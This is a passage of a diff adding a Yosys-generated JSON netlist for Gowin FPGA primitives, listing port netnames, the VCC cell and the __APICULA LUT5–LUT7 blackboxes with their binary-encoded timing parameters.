"c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1633.9-1633.17" + } + }, + "INTCLK": { + "hide_name": 0, + "bits": [ 75 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1655.9-1655.15" + } + }, + "LBKERR": { + "hide_name": 0, + "bits": [ 73 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1653.9-1653.15" + } + }, + "LINESTATE": { + "hide_name": 0, + "bits": [ 51, 52 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1632.17-1632.26" + } + }, + "OPMODE": { + "hide_name": 0, + "bits": [ 25, 26 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1622.17-1622.23" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1618.9-1618.14" + } + }, + "REXT": { + "hide_name": 0, + "bits": [ 78 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1658.9-1658.13" + } + }, + "RXACTIVE": { + "hide_name": 0, + "bits": [ 44 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1625.9-1625.17" + } + }, + "RXDM": { + "hide_name": 0, + "bits": [ 71 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1651.9-1651.13" + } + }, + "RXDP": { + "hide_name": 0, + "bits": [ 70 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1650.9-1650.13" + } + }, + "RXERROR": { + "hide_name": 0, + "bits": [ 48 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1629.9-1629.16" + } + }, + "RXRCV": { + "hide_name": 0, + "bits": [ 72 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1652.9-1652.14" + } + }, + "RXVLD": { + "hide_name": 0, + "bits": [ 45 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1626.9-1626.14" + } + }, + "RXVLDH": { + "hide_name": 0, + "bits": [ 46 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1627.9-1627.15" + } + }, + "SCANCLK": { + "hide_name": 0, + "bits": [ 83 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1663.14-1663.21" + } + }, + "SCANEN": { + "hide_name": 0, + "bits": [ 84 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1664.14-1664.20" + } + }, + "SCANIN1": { + "hide_name": 0, + "bits": [ 87 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1667.14-1667.21" + } + }, + "SCANIN2": { + "hide_name": 0, + "bits": [ 89 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1669.14-1669.21" + } + }, + "SCANIN3": { + "hide_name": 0, + "bits": [ 91 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1671.14-1671.21" + } + }, + "SCANIN4": { + "hide_name": 0, + "bits": [ 93 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1673.14-1673.21" + } + }, + "SCANIN5": { + "hide_name": 0, + "bits": [ 95 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1675.14-1675.21" + } + }, + "SCANIN6": { + "hide_name": 0, + "bits": [ 97 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1677.14-1677.21" + } + }, + "SCANMODE": { + "hide_name": 0, + "bits": [ 85 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1665.14-1665.22" + } + }, + "SCANOUT1": { + "hide_name": 0, + "bits": [ 88 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1668.14-1668.22" + } + }, + "SCANOUT2": { + "hide_name": 0, + "bits": [ 90 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1670.14-1670.22" + } + }, + "SCANOUT3": { + "hide_name": 0, + "bits": [ 92 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1672.14-1672.22" + } + }, + "SCANOUT4": { + "hide_name": 0, + "bits": [ 94 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1674.14-1674.22" + } + }, + "SCANOUT5": { + "hide_name": 0, + "bits": [ 96 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1676.14-1676.22" + } + }, + "SCANOUT6": { + "hide_name": 0, + "bits": [ 98 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1678.14-1678.22" + } + }, + "SESSVLD": { + "hide_name": 0, + "bits": [ 68 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1648.9-1648.16" + } + }, + "SUSPENDM": { + "hide_name": 0, + "bits": [ 21 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1619.9-1619.17" + } + }, + "TERMSEL": { + "hide_name": 0, + "bits": [ 24 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1621.9-1621.16" + } + }, + "TEST": { + "hide_name": 0, + "bits": [ 81 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1661.7-1661.11" + } + }, + "TRESETN": { + "hide_name": 0, + "bits": [ 86 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1666.14-1666.21" + } + }, + "TXBITSTUFFEN": { + "hide_name": 0, + "bits": [ 58 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1638.9-1638.21" + } + }, + "TXBITSTUFFENH": { + "hide_name": 0, + "bits": [ 59 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1639.9-1639.22" + } + }, + "TXDAT": { + "hide_name": 0, + "bits": [ 61 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1641.9-1641.14" + } + }, + "TXENN": { + "hide_name": 0, + "bits": [ 60 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1640.9-1640.14" + } + }, + "TXREADY": { + "hide_name": 0, + "bits": [ 43 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1624.9-1624.16" + } + }, + "TXSE0": { + "hide_name": 0, + "bits": [ 62 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1642.9-1642.14" + } + }, + "TXVLD": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1616.9-1616.14" + } + }, + "TXVLDH": { + "hide_name": 0, + "bits": [ 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1617.9-1617.15" + } + }, + "VBUS": { + "hide_name": 0, + "bits": [ 77 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1657.9-1657.13" + } + }, + "VBUSVLD": { + "hide_name": 0, + "bits": [ 69 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1649.9-1649.16" + } + }, + "XCVRSEL": { + "hide_name": 0, + "bits": [ 22, 23 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1620.17-1620.24" + } + }, + "XIN": { + "hide_name": 0, + "bits": [ 79 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1659.9-1659.12" + } + }, + "XOUT": { + "hide_name": 0, + "bits": [ 80 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1660.9-1660.13" + } + } + } + }, + "VCC": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:545.1-547.10" + }, + "ports": { + "V": { + "direction": "output", + "bits": [ 2 ] + } + }, + "cells": { + }, + "netnames": { + "V": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:545.19-545.20" + } + } + } + }, + "__APICULA_LUT5": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_lut": "00000000000000000000000000000010", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:50.1-58.10" + }, + "ports": { + "F": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + }, + "I1": { + "direction": "input", + "bits": [ 4 ] + }, + "I2": { + "direction": "input", + "bits": [ 5 ] + }, + "I3": { + "direction": "input", + "bits": [ 6 ] + }, + "M0": { + "direction": "input", + "bits": [ 7 ] + } + }, + "cells": { + "$specify$34": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000011001100110", + "T_FALL_MIN": "00000000000000000000011001100110", + "T_FALL_TYP": "00000000000000000000011001100110", + "T_RISE_MAX": "00000000000000000000010010100011", + "T_RISE_MIN": "00000000000000000000010010100011", + "T_RISE_TYP": "00000000000000000000010010100011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:52.3-52.28" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + }, + "$specify$35": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000011001100110", + "T_FALL_MIN": "00000000000000000000011001100110", + "T_FALL_TYP": "00000000000000000000011001100110", + "T_RISE_MAX": "00000000000000000000010010100000", + "T_RISE_MIN": "00000000000000000000010010100000", + "T_RISE_TYP": "00000000000000000000010010100000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:53.3-53.28" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 4 ] + } + }, + "$specify$36": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000010101011011", + "T_FALL_MIN": "00000000000000000000010101011011", + "T_FALL_TYP": "00000000000000000000010101011011", + "T_RISE_MAX": "00000000000000000000001111100011", + "T_RISE_MIN": "00000000000000000000001111100011", + "T_RISE_TYP": "00000000000000000000001111100011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:54.3-54.27" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 5 ] + } + }, + "$specify$37": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000010001011100", + "T_FALL_MIN": "00000000000000000000010001011100", + "T_FALL_TYP": "00000000000000000000010001011100", + "T_RISE_MAX": "00000000000000000000001100101000", + "T_RISE_MIN": "00000000000000000000001100101000", + "T_RISE_TYP": "00000000000000000000001100101000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:55.3-55.27" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 6 ] + } + }, + "$specify$38": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001010101000", + "T_FALL_MIN": "00000000000000000000001010101000", + "T_FALL_TYP": "00000000000000000000001010101000", + "T_RISE_MAX": "00000000000000000000000111100110", + "T_RISE_MIN": "00000000000000000000000111100110", + "T_RISE_TYP": "00000000000000000000000111100110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:56.3-56.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 7 ] + } + } + }, + "netnames": { + "F": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:50.30-50.31" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:50.39-50.41" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:50.43-50.45" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:50.47-50.49" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:50.51-50.53" + } + }, + "M0": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:50.55-50.57" + } + } + } + }, + "__APICULA_LUT6": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_lut": "00000000000000000000000000000100", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:61.1-70.10" + }, + "ports": { + "F": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + }, + "I1": { + "direction": "input", + "bits": [ 4 ] + }, + "I2": { + "direction": "input", + "bits": [ 5 ] + }, + "I3": { + "direction": "input", + "bits": [ 6 ] + }, + "M0": { + "direction": "input", + "bits": [ 7 ] + }, + "M1": { + "direction": "input", + "bits": [ 8 ] + } + }, + "cells": { + "$specify$39": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000011101100101", + "T_FALL_MIN": "00000000000000000000011101100101", + "T_FALL_TYP": "00000000000000000000011101100101", + "T_RISE_MAX": "00000000000000000000010100101011", + "T_RISE_MIN": "00000000000000000000010100101011", + "T_RISE_TYP": "00000000000000000000010100101011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:63.3-63.40" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + }, + "$specify$40": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000011101100101", + "T_FALL_MIN": "00000000000000000000011101100101", + "T_FALL_TYP": "00000000000000000000011101100101", + "T_RISE_MAX": "00000000000000000000010100101000", + "T_RISE_MIN": "00000000000000000000010100101000", + "T_RISE_TYP": "00000000000000000000010100101000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:64.3-64.40" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 4 ] + } + }, + "$specify$41": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000011001011010", + "T_FALL_MIN": "00000000000000000000011001011010", + "T_FALL_TYP": "00000000000000000000011001011010", + "T_RISE_MAX": "00000000000000000000010001101011", + "T_RISE_MIN": "00000000000000000000010001101011", + "T_RISE_TYP": "00000000000000000000010001101011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:65.3-65.39" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 5 ] + } + }, + "$specify$42": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000010101011011", + "T_FALL_MIN": "00000000000000000000010101011011", + "T_FALL_TYP": "00000000000000000000010101011011", + "T_RISE_MAX": "00000000000000000000001110110000", + "T_RISE_MIN": "00000000000000000000001110110000", + "T_RISE_TYP": "00000000000000000000001110110000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:66.3-66.39" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 6 ] + } + }, + "$specify$43": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001110100111", + "T_FALL_MIN": "00000000000000000000001110100111", + "T_FALL_TYP": "00000000000000000000001110100111", + "T_RISE_MAX": "00000000000000000000001001101110", + "T_RISE_MIN": "00000000000000000000001001101110", + "T_RISE_TYP": "00000000000000000000001001101110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:67.3-67.38" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 7 ] + } + }, + "$specify$44": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001011010011", + "T_FALL_MIN": "00000000000000000000001011010011", + "T_FALL_TYP": "00000000000000000000001011010011", + "T_RISE_MAX": "00000000000000000000000111011110", + "T_RISE_MIN": "00000000000000000000000111011110", + "T_RISE_TYP": "00000000000000000000000111011110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:68.3-68.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 8 ] + } + } + }, + "netnames": { + "F": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:61.30-61.31" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:61.39-61.41" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:61.43-61.45" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:61.47-61.49" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:61.51-61.53" + } + }, + "M0": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:61.55-61.57" + } + }, + "M1": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:61.59-61.61" + } + } + } + }, + "__APICULA_LUT7": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_lut": "00000000000000000000000000001000", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:73.1-83.10" + }, + "ports": { + "F": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + }, + "I1": { + "direction": "input", + "bits": [ 4 ] + }, + "I2": { + "direction": "input", + "bits": [ 5 ] + }, + "I3": { + "direction": "input", + "bits": [ 6 ] + }, + "M0": { + "direction": "input", + "bits": [ 7 ] + }, + "M1": { + "direction": "input", + "bits": [ 8 ] + }, + "M2": { + "direction": "input", + "bits": [ 9 ] + } + }, + "cells": { + "$specify$45": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000100001100100", + "T_FALL_MIN": "00000000000000000000100001100100", + "T_FALL_TYP": "00000000000000000000100001100100", + "T_RISE_MAX": "00000000000000000000010110110011", + "T_RISE_MIN": "00000000000000000000010110110011", + "T_RISE_TYP": "00000000000000000000010110110011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:75.3-75.52" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + }, + "$specify$46": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000100001100100", + "T_FALL_MIN": "00000000000000000000100001100100", + "T_FALL_TYP": "00000000000000000000100001100100", + "T_RISE_MAX": "00000000000000000000010110110000", + "T_RISE_MIN": "00000000000000000000010110110000", + "T_RISE_TYP": "00000000000000000000010110110000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:76.3-76.52" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 4 ] + } + }, + "$specify$47": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000011101011001", + "T_FALL_MIN": "00000000000000000000011101011001", + "T_FALL_TYP": "00000000000000000000011101011001", + "T_RISE_MAX": "00000000000000000000010011110011", + "T_RISE_MIN": "00000000000000000000010011110011", + "T_RISE_TYP": "00000000000000000000010011110011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:77.3-77.51" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 5 ] + } + }, + "$specify$48": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000011001011010", + "T_FALL_MIN": "00000000000000000000011001011010", + "T_FALL_TYP": "00000000000000000000011001011010", + "T_RISE_MAX": "00000000000000000000010000111000", + "T_RISE_MIN": "00000000000000000000010000111000", + "T_RISE_TYP": "00000000000000000000010000111000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:78.3-78.51" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 6 ] + } + }, + "$specify$49": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000010010100110", + "T_FALL_MIN": "00000000000000000000010010100110", + "T_FALL_TYP": "00000000000000000000010010100110", + "T_RISE_MAX": "00000000000000000000001011110110", + "T_RISE_MIN": "00000000000000000000001011110110", + "T_RISE_TYP": "00000000000000000000001011110110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:79.3-79.50" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 7 ] + } + }, + "$specify$50": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001111010010", + "T_FALL_MIN": "00000000000000000000001111010010", + "T_FALL_TYP": "00000000000000000000001111010010", + "T_RISE_MAX": "00000000000000000000001001100110", + "T_RISE_MIN": "00000000000000000000001001100110", + "T_RISE_TYP": "00000000000000000000001001100110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:80.3-80.38" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 8 ] + } + }, + "$specify$51": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001011010011", + "T_FALL_MIN": "00000000000000000000001011010011", + "T_FALL_TYP": "00000000000000000000001011010011", + "T_RISE_MAX": "00000000000000000000000111011110", + "T_RISE_MIN": "00000000000000000000000111011110", + "T_RISE_TYP": "00000000000000000000000111011110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:81.3-81.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 9 ] + } + } + 